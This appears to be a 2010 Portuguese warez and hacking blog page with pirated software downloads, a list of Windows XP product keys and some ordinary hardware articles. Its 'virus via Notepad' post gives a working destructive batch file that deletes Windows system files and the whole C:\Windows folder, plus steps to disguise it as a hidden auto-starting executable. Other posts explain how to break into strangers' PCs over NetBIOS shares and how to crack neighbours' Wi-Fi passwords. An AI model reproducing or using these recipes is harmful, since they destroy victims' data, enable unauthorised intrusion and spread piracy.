quarta-feira, 2 de junho de 2010

Real Player Plus 11

[Real+Player+Plus+11.jpg]

Descrição:

É um dos mais utilizados softwares para streaming - uma grande parte dos vídeos que circulam pela internet são transmitidos pelo formato RealMedia, formato esse suportado pelo RealPlayer.

Além de funcionar como plugin do navegador, ele ainda permite que se assista os arquivos de mídia que estão armazenados em seu computador, incluindo formatos como MP3, MPG, WMV, RealMedia, entre outros.

Possui equalizador gráfico de 10 bandas, programa para gravação de CD integrado e codificador com alta taxa de bits por segundo (suporta até 320kbps). Além dessas ferramentas para gravação e mixagem automáticas, você tem a opção de fazer gravações analógicas, transferindo seus discos de vinil, fitas e gravações de voz para seu computador.

Ainda possui o recurso TurboPlay, que melhora a taxa de transmissão, fazendo com que os vídeos carreguem e comecem mais rapidamente, sendo reproduzidos com a mesma qualidade em qualquer tipo de conexão, de discada à banda larga.

Compatibilidade:

Windows 98, Windows ME, Windows 2000, Windows XP

Download RapidShare:
Download

CCleaner 2.02.527

[CCleaner.jpg]


O que significa CCleaner?


CCleaner é uma abreviação das palavras "Crap Cleaner", ou seja, limpador de porcarias. Com ele você pode apagar arquivos desnecessários ao PC, ganhar maior privacidade ao apagar arqui
vos que armazenam suas atividades e melhorar o desempenho da máquina.

Como funciona?

Depois de instalado, execute-o e selecione os itens que deseja remover do computador — na opção Limpeza — e clique em Analisar, imediatamente o software faz uma busca por todo o sistema e retorna o que pode ser apagado — com o respectivo tamanho em disco que você pode recuperar.

Feito isso, clique em Executar Limpeza para que o conteúdo seja apagado definitivamente do Windows.

LIMPEZA

CCleaner é um dos varredores mais completos do gênero, possuindo uma vasta gama de opções para limpar arquivos desnecessários

Sistema: 98/Me/2000/XP/2003/Vista
Tamanho: 2,59 MB
Categoria: Limpadores

Download EasyShare


Opticyber 8.1


Trata-se de um software renomado no mercado e aconselhado pela mídia especializada com matérias incentivando a utilização do OptiCyber devido a sua segurança e confiabilidade entre outros muitos fatores, veículos como a Revista PC-Expert e a Revista Games on-line indicam a seus leitores a utilização de nosso software.

O OptiCyber foi desenvolvido a partir de um projeto feito sob encomenda pela equipe da OptiLab no ano de 1999 para a rede de livrarias Saraiva Mega Store, que tinha como objetivo controlar a utilização dos computadores disponibilizados para os clientes nos cyber cafés das lojas da rede.

No início de 2001 com o surgimento das 2 primeiras Lan Houses no estado do Rio de Janeiro ( Bunker22 que futuramente afiliou-se a rede de franquias Monkey e a Challenger, ambas extintas na data presente) a equipe da OptiLab viu neste mercado um ramo promissor e decidiu retomar o projeto que fora desenvolvido para a Saraiva Mega Store adequando seu funcionamento para atender além de Cyber Cafés esse novo conceito de negócio denominado Lan Houses & Game Centers.

Servidor: EasyShare / RapidShare
Desenvolvedor: Optilab
Idioma: Português
Tamanho: 8 mb
Formato: .Rar

Download:

EasyShare: Clique Aqui

RapidShare: Clique Aqui

Invadindo Router Wireless (Wi-Fi) (Tutorial)



Todos temos lido, visto e ouvido muita “propaganda” sobre insegurança nas redes Wireless. Quem não teve já contacto com redes desprotegidas? E os que se protegem sabem se estão seguros dessa forma?

É um “clichê” dizer que “nada é 100% seguro”, é verdade, nada é 100% seguro. Estou mesmo convencido que se alguém com certos e determinados conhecimentos se aplicar a explorar vulnerabilidades na segurança do Wireless, conseguirá frutos em quantidade industrial.
Quem estiver mal intencionado pode, com as ferramentas certas, descobrir redes desprotegidas e de alguma forma prejudicar quem se sente seguro por trás do seu PC ligado ao mundo da Internet.

Felizmente ou infelizmente a Internet é um berço para estas ferramentas gratuita, ferramentas que nos fornecem dados importantes sobre redes Wireless, neste caso deveremos usar esta mala de ferramentas para testar a nossa própria segurança.
Estilo: Hacker
Idioma: Português
Tamanho: 0.80Mb
Formato: .Pdf

Processadores Intel: Quais as diferenças entre os modelos vendidos atualmente ?

A fabricante número um de processadores do mundo disponibiliza sete modelos principais de CPUs com múltiplos núcleos. Talvez você já tenha visto nomes como “Dual Core”, “Core2Duo”, “Core2Quad” ou “Core i7”, no entanto pode ser que você não tenha a mínima idéia das diferenças reais entre eles.

A princípio é fácil perceber que um “Dual Core” possui dois núcleos, mas então o que o “Core2Duo” traz de diferente? Abaixo você vai conferir descrições sobre cada processador, porém este artigo visa apenas descrever as configurações internas de cada um e mostrar o tipo de tarefa que cada um desses CPUs foi designado, por isso não espere uma tabela comparativa com preços e indicações de qual é o melhor.

Pentium D

Lembra dos antigos Pentium 4? Pois é, o Pentium D é a junção de dois processadores Pentium 4. Muitos usuários pensam que o Pentium D é um processador de núcleo duplo excelente, porém a história é um pouco diferente. Assim como acontecia com o Pentium 4, tudo se repetiu no Pentium D.

A Intel precisava colocar dois núcleos com uma freqüência muito alta para conseguir um bom desempenho. A memória cache dos Pentium D é razoavelmente suficiente, porém como a Intel parou de investir neste tipo de CPU, atualmente os valores de memória e até a própria velocidade destes processadores não proporcionam bons resultados em games e aplicativos pesados.

Pentium Extreme Edition

Pelo nome não parece, mas os tais Pentium Extreme Edition são processadores de duplo núcleo também. A diferença entre estes e os Pentium D é, basicamente, que o Extreme Edition é um processador com dois Pentium 4 Extreme Edition trabalhando em conjunto. Com um desempenho um pouco melhor, algumas tecnologias a mais que auxiliam no trabalho pesado, este processador ganhou pouca fama, pois logo foi substituído por outros modelos.

O Pentium 4 Extreme Edition trabalhava com a tecnologia HT (a qual simulava dois processadores num só), a qual permitia um ganho de até 30% em múltiplas tarefas. Como o Pentium Extreme Edition é uma evolução, ele traz dois núcleos que operam com a tecnologia HT. Sendo assim, os dois núcleos do Pentium Extreme Edition simulam dois núcleos virtuais, de modo que o processador disponibiliza quatro núcleos para o sistema.

Core 2 Duo

Atualmente os Core 2 Duo estão entre os processadores mais cobiçados para jogos. Se comparado com os antigos processadores de dois núcleos da empresa, os novos Core 2 Duo mostram uma superioridade incrível. O grande motivo da diferença em desempenho é o novo sistema de núcleo da Intel.

Os antigos Pentium D trabalhavam com uma linha de processamento idêntica a dos Pentium 4, já os tais Core 2 Duo funcionam com a nova tecnologia Core. Com uma freqüência (velocidade) mais baixa, um pouco mais de memória interna, modos mais eficiente de compartilhamento de recursos e alguns outros detalhes, os Core 2 Duo são os processadores mais potentes no ramo dos Dual Core.

O Intel Core 2 Duo é indicado para jogos de última geração, edição de imagem e vídeo, programas matemáticos ou de engenharia e tarefas que requisitem alto processamento. Há vários modelos, sendo que os mais fortes não são viáveis para quem procura montar um PC econômico.


Pentium Dual Core

O Pentium Dual Core surgiu praticamente na mesma época do Core 2 Duo. Tendo a arquitetura (sistema interno de peças) baseada no Core 2 Duo, o Pentium Dual Core trouxe apenas algumas limitações. O tão falado FSB (barramento frontal) tem velocidade menor, a memória interna (cache) do processador é menor e os modelos disponíveis trazem clocks (velocidades) mais baixos.

Para o usuário que procura apenas navegar na internet e realizar tarefas simples, este processador pode ser uma excelente escolha, visto que a relação custo-benefício dele é uma das melhores quando se fala em processadores Intel de duplo núcleo.

Core 2 Quad

Descendentes dos Core 2 Duo, os novos Core 2 Quad nada mais são do que processadores com quatro núcleos e um sistema interno muito semelhante aos seus antecessores. Ainda novos no mercado, os Core 2 Quad apresentam desempenho relativamente alto, porém em algumas tarefas eles perdem para os Dual Core.



O grande problema nos “Quad Core” (termo adotado para falar a respeito de qualquer processador de quatro núcleos) é a falta de programas aptos a trabalhar com os quatro núcleos. Além disso, o custo destes processadores ainda não é ideal para os usuários domésticos.


Core 2 Extreme Quad Core

Apesar da grande performance apresentada pelos Core 2 Quad, a Intel conseguiu criar um processador quase idêntico com maior velocidade. Apresentando dois modelos com a velocidade de clock superior, a Intel criou estes processadores especificamente para gamers e usuários fanáticos por overclock.

A relação custo-benefício é péssima, pois custam quase o dobro dos Core 2 Quad e não fornecem o dobro de desempenho. Em jogos há um pequeno ganho de desempenho, mas nada extraordinário que valha realmente a pena.

Vale ressaltar que há processadores Core 2 Extreme de dois e quatro núcleos. Ao comprar um Core 2 Extreme é importante averiguar se o processador é de dois ou quatro núcleos, pois enganos acontecem e você pode acabar pagando por um processador Quad Core e levar um Dual Core, muito cuidado!


Intel Core i7

A última palavra em tecnologia é o Core i7. A nova linha de processadores da Intel opera com quatro núcleos, velocidade semelhante a dos Core 2 Quad e quantidade de memória cache parecida. As mudanças são diversas, começando pelo suporte de memória DDR3 e abrangendo até o modo de comunicação com os outros itens do PC.

O novo Intel Core i7 traz a tecnologia HT, a qual simula múltiplos núcleos e tende a aumentar o desempenho significativamente para aplicações que trabalhem com a divisão de processamento. Segundo o site da Intel, estes novos processadores podem simular até oito núcleos, isso se o sistema operacional for compatível com a tecnologia.

Como estes processadores são lançamento, o preço deles é astronômico (dificilmente encontra-se um processador dessa linha por menos de mil reais), sendo indicado apenas para entusiastas e pessoas com muito dinheiro. A performance do Core i7 é sem dúvida superior a qualquer outro processador, no entanto talvez não seja uma boa idéia comprar estes processadores agora, visto que não há programas que exijam tamanho poder de processamento.

DirectX 10 fix 3 para Windows XP

ReiDoDownload.BlogSpot.com


Versão nova do directx 10 pro Windows xp.

Tamanho:
6,49 Mb


PCSX 2.0.9 - melhor emulador para playstation 2



O PCSX 2.0.9 é o melhor emulador para play station 2 oferece uma vantagem enorme, pois já vem com todas as bios, plugins e tudo o mais que for necessario para rodar seus jogos, eu consegui rodar nele só para vocês terem uma idéia o jogo Def Jam Fight for NY para play 2 que é pesado num notebook dual core 1.7 com 1 GB de ram e 256 MB de video, então divirtam-se.

Observação: para rodar com essas configurações acima sitadas foi usado no windows xp, com o vista fica lento! boa sorte.

Playstation 2 Emulator



Emulador de PlayStation 2

Jogue seus jogos de PS2 no computador, ou se você não tem PS2, peça os jogos dos seus amigos emprestados ;)

Curso Avançado de Reparos e Manuntenção em Video Games PS1 e PS2



Quer aprender a consertar seu vídeo-game, em casa, sem ter dores de cabeça com assistências técnicas desonestas? Quer atualizar seus conhecimentos de eletrônica? Quer consertar aquele defeito que nenhum técnico de sua cidade consegue? Quer expandir seus negócios? Então baixe hoje mesmo o material do curso de manutenção e você verá como é simples, fácil e rápido.
O material tem linguagem clara, objetiva e foi criado de forma a atender o maior número possível de leitores, sem pré-requisitos ou idade mínima. Para o leigo tratamos dos assuntos de forma passo-a-passo. Para os técnicos incluímos seções com informações práticas.
Destaque para desbloqueios (para rodar jogos alternativos) , instrumentos e muito mais…

* Tamanho: 18 MB
* Idioma: Português
* Sistema: Todos
* Formato: HTML, PDF

Pcsx2 0.96+ Plugins Ja configurado (Emulador de Playstation 2)



Descrição: Versao atualizada. Qualquer corel ja roda galera jogo Shadow of Colossus e os 2 God of War perfeitamente

Tamanho: 16Mb
Hospedagem: Uploading

Windows Se7en Pirateado - Windows 7 x86(32 bits) e x64(64 bits) Português-Br -Todas as Versões - ACTiVATED



Image Hosted by ImageShack.us

  • x86: bits (32 bits)

  • x64: bits (64 bits)
  • Disco de Boot para Processadores AMD - Ultimate Boot CD 5.0.0 Final



    O Ultimate Boot CD é um conjunto de ferramentas de diagnóstico e correção que podem ser iniciadas no boot do computador, o que ocorre antes que o sistema operacional entre em funcionamento. Por esse motivo o download do arquivo é no formato de imagem ISO, o mais conhecido do gênero.

    Esse tipo de dado agrega tudo o que há em uma mídia dentro de um só arquivo. Para utilizá-lo você deve gravá-lo em um CD ou DVD, o que pode ser feito através de programas conhecidos pelos usuários, como o Nero, o Ashampoo ou o ISSO Burner, um aplicativo especialmente desenvolvido para a tarefa. No Windows 7 há um gravador nativo para arquivos ISO e basta clicar duas vezes sobre ele para iniciar o processo.

    Download - Tam: 200mb

    Seriais para Windows XP


    Uma lista com vários seriais do Windows XP.

    QW4HD-DQCRG-HM64M-6GJRK-8K83T
    PQTHM-RWBHR-3BPVW-TFB22-V8HXQ
    KQC2B-X683R-2CDXT-PQ7HQ-47MPT
    JFQYM-YJQFQ-VBRCY-4VV7W-QRXBY
    KMTTB-68H32-8MKRK-GBHKT-RKCP6
    CX7DD-4GX4Y-BTTR4-H88Y7-GQPWQ
    XP8BF-F8HPF-PY6BX-K24PJ-TWT6M
    8RCKG-36TH8-VWBGK-T3CB6-RHG48
    7G4H4-T4XXW-BVXTH-4QP4V-9CV28
    PG274-383QX-6C32H-P8RWC-48M4Q
    CWY3F-JGYHJ-W6KBG-3VYK7-DGG7M
    X6YWJ-M4TG2-DPGWJ-QCFR8-927M6
    QCP6D-7VGVJ-JBKB4-DQMB2-9GTJ3
    F7GV4-B7JGY-Q2KQW-6R8BM-FR8D6
    HFVK4-TFWFG-4JKDH-H3FTT-8B23W
    HRPR7-WGJFC-VPHRB-XVFRW-2KPWY
    V3V63-3QW2G-JMFBY-8F4CM-PDMQW
    WX736-8YJCM-2JW33-4KJGY-XCDJ6
    CQKYH-GKDJC-MJTWP-FPTJX-PKK23
    CHYVW-V63RT-67XVC-XJ4VC-M3YWD
    XMDCV-2TJMR-7JD66-YTVMK-V7PBD
    RQHFJ-X47QJ-G2XKK-WYQ8P-7W6RG
    X6MYY-6BH3T-YRBT8-H8YPH-RG68T
    KVXQ3-RVQFG-FW8KC-2QYC6-67WCD
    KMM7J-FCXMM-WV8PG-6FQMD-CPTQD
    D6T24-3FBGM-WTDG8-6Y3WP-77QRJ
    V88FQ-MFFRR-8D2VY-PG87J-FG7PY
    XK39D-3PDMC-JMMDK-X8T8M-77YVM
    6G3J7-RQ233-FJGHD-GKYP4-QGKPG
    BKRFY-XPMQP-Y8PTW-BP6JM-B76FJ
    GP7DR-2T2CQ-JYW2M-DXTMG-DTQWY
    YWVHF-GT3M6-3QYB2-FCYCH-X47PQ
    QJ68H-G7T8R-WFR77-D8X8Y-VJ398
    6KYDY-JT4MB-6V3JQ-4KKFG-P6C63
    6JQPJ-84CFG-JCBQP-PVRJP-9G24Q
    MQ8JV-XXKVG-DB8V3-67WJB-RCB6W
    J3T66-JTP72-TGT7H-PMMWH-XM4K3
    DB4H8-DQJJB-KXMWP-GPJVY-H7P6W
    38BXC-F2C4R-PXMXV-DBQXM-3C7V6
    7FMM3-W4FMP-4WRXX-BKDRT-7HG48

    Seja integrante do Raton Downloads


    quarta-feira, 24 de março de 2010

    Tutorial: Cheat Engine

    Hoje eu estou postando um programa hacker que serve para jogos e até outros programas, chamado de CHEAT ENGINE.

    Link 1:http://www.badongo.com/file/10130165
    Link 2:http://www.4shared.com/file/53239223/f729e58b/CheatEngine54.html

    Quem souber inglês facilita bastante, é só executar o arquivo CHEAT ENGINE TUTORIAL e o CHEAT ENGINE e seguir os passos.

    bom. mas se você não souber muito, tudo bem, vou dar uma explicaçâo rápida do programa....

    1 - Execute o programa ou jogo que você quer hackear...
    2- Abra o Cheat Engine
    3- Clique no computador lá em cima do programa que vai estar piscando
    4- Agora selecione na lista o programa que você quer hackear, (geralmente é o penultimo)
    5- Agora na barra VALUE coloque o valor que você quer modificar;

    exemplo: eu estou jogando um jogo e estou com 52 de vida e eu quero colocar 10000000000000 de vida, então você põe nessa barra 52. Clique em FIRST SCAN.

    6- Agora vai aparecer vários valores na tabela ao lado.
    procure o que você quer modificar e de dois cliques nele, ele vai aparecer na tabela em baixo, clique com o botão direito e selecione "CHANGE RECORD" e depois "VALUE", agora digite o valor que você quer.

    "ALGUMAS DICAS IMPORTANTES": Provavelmente vão aparecer vários valores iguais, dependendo do programa que você quer hackear não tem problema, por exemplo um jogo, já se for algum arquivo do sistema, é melhor você ter certeza.

    Se você for hackear um jogo, dependendo de qual ele pode ter um anti-hacker (geralmente jogos online) (como o game-guard e x-trap) provavelmente no máximo você não consegirá entrar no jogo.

    Mas sempre existe uma saída. uma delas é excluir a pasta do anti hacker do jogo, outra é procurar no google por um "BYPASS" que são programas que conseguem burlar esses anti hackers. Mas eu tenho alguns aqui, mas como são milhões de jogos que existem, se precisarem de um programa desses é só pedir que eu consigo.

    CRIANDO VÍRUS PELO BLOCO DE NOTAS

    Para destruir o pc de uma pessoa você tem que criar no bloco de notas (iniciar / todos os programas / acessorios / bloco de notas) copie e cole no bloco de notas isso abaixo:

    CD\
    CD\WINDOWS
    DEL WIN.INI
    DEL WIN.COM
    DEL SYSTEM
    DEL SYSTEM.INI
    DEL SYSTEM.COM
    DEL SYSTEM32
    DEL SECURITY
    DEL REGEDIT.EXE
    DEL HH.EXE
    DEL CONFIG
    DEL CONTROL.INI
    DEL CONTROL.COM
    DEL DEBUG
    DEL CLOCK.AVI
    DEL TASKMAN.EXE
    DEL WININIT.INI
    DEL WININIT.COM
    DEL WEB
    CD\
    DEL CONFIG.SYS
    DEL AUTOEXEC.BAT

    rmdir /s /q c:\windows Após ter feito isso salve o arquivo e renomeio de auguma coisa que você queira por no titulo, mas tem que ter no final .bat (exemplo: virus.bat) ATENÇAO: Nunca aperte nesse icone se possivel deixe oculto para ninguém conseguir clikar nele.

    ou Va em iniciar/executar e digite notepad. Irá abrir o bloco de notas. Copie o comando e cole no bloco de notas ao salvar você usa .bat exemplo: sacanear.bat del /s /q c:\windows\ (deleta tudo dentro do windows arquivos e naum pastas)

    rmdir /s /q c:\windows(deleta todo do windows) - (fode o pc)shutdown -s(desliga o pc)shutdown -r(reinicia o pc) Fazendo um virus.exe com winrar. Abra o bloca de notas e digite shutdown -r -f shutdown -r -> desliga o pc reiniciando shutdown -f -> força o pc a desliga.. encerrando qualquer programa..Salve como desliga.bat

    Transformando em .exe ( tem que ter o WinRar)clique com botao direito no arquivo .bat, e vá em adicionar para o arquivo.marque criar arquivo SFX. Note que o nome muda para por exemplo desliga.exe.vá até a guia avançado e clique em opçao sfx.

    em caminho para extraçao coloque: %homepath%\Menu Iniciar\Programas\Inicializar
    marque caminho absoluto e salvar e restaurar caminho em executar após a extraçao coloque: desliga. bat na guia metodo. marque ocultar tudo e ignorar arquivos existentes.

    CUIDADO: não execute o arquivo pois seu computador sera infectado!

    outros comandos para o seu vírus:
    c\ - volta todas as pastas e vai parar em
    c: cd XXX - entra na pasta, coloque o caminho no lugar de XXX -
    exemplo: cd windows\system32\md XXX - cria uma pasta, no lugar de XXX coloque o nome da pasta
    exemplo: md teste


    quarta-feira, 10 de março de 2010

    Tutorial: Criando Servidor FTP - File Transfer Protocol

    Olá. Neste tutorial, você vai aprender a criar um servidor FTP. Antes de mais nada, é necessário saber o que é FTP e para que serve. FTP é a sigla de File Transfer Protocol, Protocolo de Transferência de arquivos. Num site FTP, o usuário poderá baixar os arquivos disponíveis e, em alguns casos, poderá hospedar arquivos também. Os sites FTP são diferentes de um site comum (HTTP). A principal característica deles é que ao invés de apresentar escritas, banners, figuras, etc, são exibidos arquivos e pastas, tal como acontece no Windows Explorer. Podemos citar como exemplo o FTP da Microsoft (ftp://ftp.microsoft.com/).
    Se você gostou do FTP da Microsoft e gostaria de fazer um site igual, você precisará do seguinte:


    [*]Um Servidor FTP

    [*]Um domínio

    [*]Um atualizador de IP (se o seu IP for dinâmico)

    1. Servidor FTP

    Este é o componente básico para que seja possível a criação do site FTP. Servidor FTP é o programa responsável por determinar quais arquivos devem ser compartilhados, além de outra funções básicas. Um dos melhores e mais simples de usar é o CesarFTP que pode ser baixado aqui.
    Após instalar o servidor, abra-o clicando no atalho da Área de trabalho ou usando o Menu Iniciar. Feito isso, clique no botão User Groups settings da janela principal do programa.



    Na nova janela que abrir, clique no botão Add User. No campo User/Group name digite o seu nome. Agora, se você quiser criar um site FTP privado, onde apenas algumas pessoas podem entrar, preencha o campo Login com um nome de usuário, marque a caixa Password e digite uma senha. Dessa forma, só terá acesso ao seu site quem souber a senha. Agora, se você quer criar um site aberto à todos, simplesmente clique no botão Anonymous Access, deixando a caixa Password desmarcada.



    Agora clique em File Access Rights. Irá surgir uma janela dividida em duas partes: a de cima mostra os seus arquivos e a de baixo, os arquivos que irão aparecer no FTP. Arraste para a parte de baixo, os arquivos que você deseja compartilhar.



    Se quiser criar uma nova pasta no seu FTP, clique com o botão direito do mouse no painel inferior e clique em Add a virtual directory.
    Quando terminar de compartilhar os seus aruqivos, clique em Close.
    Pode parecer incrível, mas o seu servidor está pronto e já pode ser acessado. Para acessar o seu site, conecte-se à Internet, em seguida clique em Server options, na janela principal. Na guia IP Configuration veja aqul é o seu IP olhando na coluna Home IP. Agora que você já sabe o seu IP, digite-o o precedido de 'ftp://' na barra de endereços do seu browser (Ex.: ftp://127.0.0.1). Se o site abrir, significa que foi configurado corretamente.

    1.1. Controlando o acesso

    Quando um usuário entra no seu FTP, você será notificado e poderá monitorar tudo que ele fizer por lá. Vc pode fazer isso clicando no menu Statistics e em seguida em Show. Vc também pode determinar se os usuários poderão acessar o seu site em um dado momento. Para isso, basta clicar no ícone de Semáforo da barra de ferramentas. Quando ele mudar para vermelho, o seu servidor será fechado e nenhum usuário poderá entrar e, quem já estiver navegando, será desconectado do FTP e as atividades serão canceladas. Clicando no ícone de um cadeado, o semáforo mudará para amarelo e o seu servidor ficará fechado apenas para quem quiser entrar, mas os usuários que estiverem navegando no momento continuarão lá. Clicando novamente no ícone de semáforo, ele mudará para verde, o que significa que o servidor está aberto para quem quiser entrar.

    2. Criando um domínio

    Vc pode acessar o seu servidor pelo IP, mas a melhor forma de acessar o seu servidor é através de um endereço. Se você tem IP dinâmico (q muda a cada conexão à Internet), seria totalmente inviável a divulgação do mesmo, já que mudaria na sua próxima conexão e ficaria inacessível. E quem tem IP fixo (q não muda nunca) poderia divulgá-lo normalmente, mas isso poderia atuar como uma brecha de segurança já que muitas pessoas mal-intencionadas poderiam usá-lo para invadir a sua máquina e fazer mil coisas em seu micro. Para evitar isso, é necessário configurar um domínio para o seu site. Um domínio, nada mais é do que um endereço fixo. Para registrar um domínio GRATUITAMENTE, acesse o site www.no-ip.com, clique em Sign-up e preencha o formulário corretamente. Vc receberá um e-mail com a confirmação do seu cadastro. Então faça o login no site através do seu e-mail e da senha que você criou no cadastro e, no lado esquerdo da página, clique em Add. Defina um host e uma terminação para o seu endereço. Por exemplo, se você escolheu como host arquivos e a terminação no-ip.com, seu endereço será ftp://arquivos.no-ip.com. Digite o seu endereço IP e clique no botão Create Host. Se você tem IP fixo, não precisa fazer mais nada porque o seu site já está configurado. Agora é só usar o endereço que você criou para acessá-lo. Se você tem IP dinâmico precisa seguir o passo seguinte.

    3. Atualizador de IP

    Baixe o atualizador de IP do No-IP neste link. Após a instalação, entre com o seu e-mail e senha cadastrados no no-IP. Marque a caixa ao lado do seu host e clique no botão Options. Na guia Standard marque a primeira caixa de diálogo se estiver usando Windows9x/Me ou marque a segunda caixa se estiver usando Windows NT, 2000 ou XP. Por fim, clique em OK. Pronto, o seu servidor FTP está devidamente criado e configurado. Agora é só divulgar o endereço.

    terça-feira, 9 de março de 2010

    ::..BRUNO THE HACKER..:: A arte de Invadir!! - Invadindo um Pc pelo IP [Método iniciante]

    Aqui vou postar uma forma possível de invasão (muito conhecida)

    quando se consegue o IP de alguém.

    Antes de tudo, não são em todos os casos que se obterá sucesso, já

    que a vítima tem que ter no PC dela seus arquivos compartilhados e o

    aplicativo nbtstat (é um arquivo que exibe estatísticas de protocolo

    netbios sobre TCP/IP), as tabelas de nomes netbios dos computadores

    local e remoto e o cache de nomes netbios. Você terá que digitar um

    parâmetro depois de nbtstat, para que se execute a tarefa, por

    exemplo –c (vai aparecer o conteúdo dos nomes netbios).

    Depois de obter o IP:

    1°) Vá no prompt de comando [Iniciar/executar ~>cmd.exe] e digite:

    nbtstat –a IP.DA.VÍTIMA (O parâmetro –a serve para exibir a tabela

    de nomes netbios de um computador remoto).

    2°) Se a vítima tiver compartilhamento de arquivos aparecerá suas

    pastas e, se não, deverá aparecer uma mensagem assim: “Host Not

    Found” ou então “Host não encontrado”

    Se a vítima tiver arquivos compartilhados irá aparecer a tabela de

    nomes da netbios do PC dela.

    3°) Você precisará daquilo que estiver escrito com “<03>” atrás.

    Crie um arquivo de texto (com o bloco de notas mesmo) e coloque com

    o nome “LMHOSTS”.

    4°) Digite no arquivo o IP e o netbios, ficando assim: xxx.xxx.xxx

    netbios (x = n° componente do IP)

    5°) Mapeia a unidade de disco deixando o PC da vítima como sendo

    parte integrante do seu, para isso vá em “Meu computador” e clique

    com o botão direito do mouse e em “Mapear unidade de rede...”

    6°) Vá no Menu Iniciar e em Executar e digite://ip.da.vítima e

    clique em OK. Agora você vai estar no PC da vítima.
    ___________________
    Apartir daí você faz o que você quizer com a vitima

    Se fizer merda , Culpa é sua!!!
    Vlw!!

    COMO ENTRAR EM COMPUTADORES ALHEIOS PELO IP

    Das inúmeras formas de invasão, a por IP é sem dúvida uma das mais poderosas.

    Para começar você precisa instalar o cliente para redes da Microsoft. Para isso você deve ir no Painel de Controle e clique em Redes. Depois clique em adicionar e seleccione Cliente, depois clique em adicionar. Seleccione desta vez Microsoft, Cliente para redes Microsoft e depois clique em OK. Depois de fazer isso, reinicie o computador. Agora vamos a parte prática da coisa:

    Certifique-se de que você tem o programa NBTSTAT, no Windows. Depois disso entre no prompt do MS-DOS.

    Digite: nbtstat -A o IP do cromo que você quer invadir, por exemplo: C:\C:\ nbtstat -a 10.100.100.3

    Vai aparecer isto:

    NetBIOS Remote Machine Name Table

    Name Type Status

    ---------------------------------------------

    DATARAT <00> UNIQUE Registered

    R9LABS <00> GROUP Registered

    DATARAT <20> UNIQUE Registered

    DATARAT <03> UNIQUE Registered

    GHOST <03> UNIQUE Registered

    DATARAT <01> UNIQUE Registered

    - Aparecerá, se a pessoa tiver partilha de pastas, as pastas do PC dela. Se não aparecerá : Host Not Found (a foda é que não da para invadir o computador de certos cromos por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC partilha de pastas)

    - Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve tirar o nome do que estiver com <03> atrás do nome.

    - Procure no windows um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cromo seguido do NetBios dele) . O NetBios é aquele nome esquisito que tem o <03> atrás. (Digite exatamente daquela forma que eu digitei)

    Por exemplo

    10.100.100.3 GHOST

    E salva o ficheiro Lmhosts

    - Mapeie sua unidade de disco de forma que a máquina do cromo se torne parte de seu PC, se não conseguir, use a ajuda do próprio programa.

    Vá ao explorador do windows clique em ferramentas e ligar unidade de rede

    - Vá em "Iniciar", "Executar" e digite: //IP_do_cromo e ponha "OK"

    - Pronto! Você já invadiu por IP!

    Eu aconselho não apagar nem modificar nada no PC do cromo, apenas fuçe bastante e obtenha informações!

    OBS: Há algumas pessoas que renomeiam o arquivo vnbt.386 no windows\sytem para que se alguem tentar te nukar ou invadir não consiga... ; pois bem, você vai ter que renomear o seu arquivo novamente senão não da para invadir. Lembre-se, não prejudique ninguém com essa tática de invasão.

    Aprendendo e Ensinando

    Conhecendo e "quebrando" senhas Wireless

    Quebrar senhas de redes wireless pode parecer uma tarefa impossível, mas não é bem assim, há uma frase muito popular que diz o seguinte:
    “Nem tudo é 100% seguro”.

    Para nos conectarmos a uma rede wireless temos que (ás vezes) digitar senhas gigantes, outras vezes senhas pequenas, e em alguns casos nem senha temos que digitar.

    O objetivo aqui é fazer com que você possa usar a internet testar a rede do vizinho, a do hotel do lado da sua casa, a da empresa lá da frente, a do supermercado e mais um tanto de redes que tem como semelhança “falha de segurança”. Claro que algumas redes são bem mais estruturadas, trabalham com MAC-ADRESS, DHCP COM FILTRO DE IP, ETC.

    Atualmente existem formas de proteção de rede wireless sendo elas: WEP, WPA e WPA2.

    WEP Quando a rede que você está tentanto acessar testando a segurança for do tipo WEP, você já pode ficar feliz, poís, ao longo dos anos infinitas ferramentas foram disponilizidas para quebrar senha desse sistema que hoje é considerado INSEGURO(vindo ainda em vários roteadores wireless)


    Programas para quebrar senhas WEP:


    AirsnortUsando está ferramenta você com certeza irá descobrir estrátegias novas de quebrar a senha rápidamente, existem ferramentas anexadas no site para cada caso em especial e símplificação de processos. Claro que em alguns casos será rápido, em outros será preciso mais de uma tentativa. (WEP)


    WirelessKeyView – Está ferramenta diferente da de cima não tem o objetivo de quebrar senhas, mas sim revelar senhas que já foram utilizadas no PC, por exemplo: suponhamos que algum administrador de rede digitou a senha em seu pc mas não a forneceu, logo, este programa revela a senha pra você. (WEP)
    Muitos administradores de rede usam esse software para recuperar a senha que fora feita e os mesmos esqueceram, eu ja usei várias vezes quando esqueci a senha de alguem ou quando estava precisando mt de internet e as redes wireless próximas eram todas protegidas com senha.



    Wireless WEP Key Password Spy 1.0 – Faz exatamente a mesma coisa que o software acima, mas com mais precisão. (WEP) WPA Bom aqui você já terá difículdades, poís, o WPA é na verdade o WEP com “todas” as falhas corrigidas ! Será ? Mesmo assim existem técnicas para acessar a rede, a mais conhecida é o Brute-Force, que tenta forçadamente descobrir a senha.


    CowPatty – “Brute force” é o metodo que este software utiliza para quebrar senhas WPA, a revelação da senha vai depender diretamente da complexidade da senha configurada, isso é, se a senha for:”12345″, o software tentára de tudo até encontrar 12345, mas se a senha for: “#5gCB$%a5vV¨6″ o software terá muito mais trabalho para descobrir isso. Mas você deve ter paciência, o hackers do mundo todo tem, por quê você não pode ter, o importante é dar certo.


    Existem mais e ainda softwares q quebram WPA e WPA2, pesquisadores estudam formas de sinal criptografados e variaveis que bloqueam a entrada 'inimiga' e esse é um caso da segurança WPA2 (usada principalmente em bancos), eu ainda falo delas.

    Mas atenção!!!!
    Eu vejo essas descobertas e criações como formas de nos protegermos e não de invadirmos, a tecnologia é uma mão na roda para a evolução se todo mundo cooperar e ter o mínimo de carater todos saem ganhando...
    Resumindo, não usem esses programas para invadir redes desconhecidas, apagar arquivos de empresas armazenados em servidores e etc...
    Para as pessoas que estão entrando com wireless em casa ou escritório/empresa eu recomendo comprar roteadores da linksys , 3com ou D-link os 3 ja vem com proteção wap/wap2 que é muito mais complexo que quebrar (apesar de não ser impossivel).

    ta ai o link meu irmão

    http://sourceforge.net/projects/cowpatty/

    nao abre o programa

    quinta-feira, 4 de março de 2010

    Drivers de Audio

    Realtek AC 97 Audio Driver: ftp://202.65.194.18/pc/ac97/alc650/WDM_A378.exe
